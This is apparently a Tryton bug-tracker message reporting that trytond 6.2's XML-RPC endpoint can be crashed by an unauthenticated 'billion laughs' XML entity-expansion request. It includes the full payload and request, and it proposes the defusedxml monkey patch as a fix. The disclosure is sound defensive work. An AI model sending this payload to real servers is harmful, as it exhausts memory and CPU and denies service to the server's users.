Message 74016

Author
jeremy.mousset
Date
2022-02-11.13:03:34
Message id
74016

Content

Tested against trytond 6.2 with Python 3.8.10

A non authenticated user can saturate the trytond server's memory and CPU usage with a single xmlrpc request , using the billion laughs attack or other similar "xml bomb" attacks.

Request example [ do not test it against a production server of course :) ] :

url : http//example.trytond.com/
method: POST

headers:
Content-Type: text/xml

body:

<?xml version='1.0'?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<methodCall>
<methodName>&lol9;</methodName>
<params>
</params>
</methodCall>

When the trytond server receives the request, its RAM usage quickly skyrockets, and the CPU also becomes very busy.
When testing the request on my machine, the 16GB of RAM and 1 GB swap were full in under a minute.

defusedxml has a monkey patch for this.

If we use this monkey patch by adding the following to to trytond/protocols/xmlrpc.py:

 from defusedxml.xmlrpc import monkey_patch
 monkey_patch()

then the server will respond to the same request with :

"400 Bad Request: Unable to read XMl request".
(because the monkey patch forbids it)

So, it does looks like a simple protection against this attack and similar "xml bomb" attacks.

History
Date User Action Args
2022-02-11 13:03:35jeremy.moussetsetrecipients: + ced, yangoon, nicoe, pokoli, roundup-bot, reviewbot
2022-02-11 13:03:34jeremy.moussetsetmessageid: <1644581014.9802082.6FFD7HNFX552PELZ.issue11244@tryton.org>
2022-02-11 13:03:34jeremy.moussetlinkissue11244 messages
2022-02-11 13:03:34jeremy.moussetcreate

Showing 10 items. Show all history (warning: this could be VERY long)